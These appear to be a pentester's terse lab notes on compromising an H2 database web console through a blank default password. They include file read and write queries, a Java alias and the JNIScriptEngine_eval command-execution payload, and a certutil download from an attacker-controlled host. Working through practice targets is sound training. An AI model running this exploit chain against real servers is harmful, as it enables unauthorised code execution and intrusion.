3 :8082

192.168.105.66:8082/login.jsp
H2 database http console

# trying default credentials
sa:tisadmin

# no password is set
sa:<nothing> works

http://192.168.105.66:8082/login.do?jsessionid=2657f960b16d6abce3d39a14b845e511
# connected to database

# found exploits
(manual) - https://medium.com/r3d-buck3t/chaining-h2-database-vulnerabilities-for-rce-9b535a9621a2

# 1. creating new database with new user
Database "C:/Users/tony/kashz" not found, and IFEXISTS=true, so we cant auto-create it [90146-199] 90146/90146 (Help)

# 2. FILE_READ
SELECT FILE_READ ('C:\Users\Public\Desktop\desktop.ini',NULL);

# 3. FILE_WRITE
SELECT FILE_WRITE ('kashz kashz kashz','C:\Users\Public\Desktop\kashz.txt');
IO Exception: "java.io.FileNotFoundException: C:\Users\Public\Desktop\kashz.txt (Access is denied)"; "C:\Users\Public\Desktop\kashz.txt"; SQL statement:

# 4. Create alias and try to run cmds and Run alias
CREATE ALIAS KASHZ AS $$ String shellexec(String cmd) throws java.io.IOException {
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }$$;
CALL KASHZ('whoami');

# manual didn't work
(direct commands) - https://www.exploit-db.com/exploits/49384
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');
jacko\tony

# powershell did not work; so absolute path
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c $host").getInputStream()).useDelimiter("\\Z").next()');

# test file download and read
# try different path for download
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil.exe -urlcache -f http://192.168.49.105/kashz.txt C:\\Users\\Tony\\Documents\\kashz.txt").getInputStream()).useDelimiter("\\Z").next()');

SELECT FILE_READ ('C:\Users\Tony\Documents\kashz.txt',NULL);

# works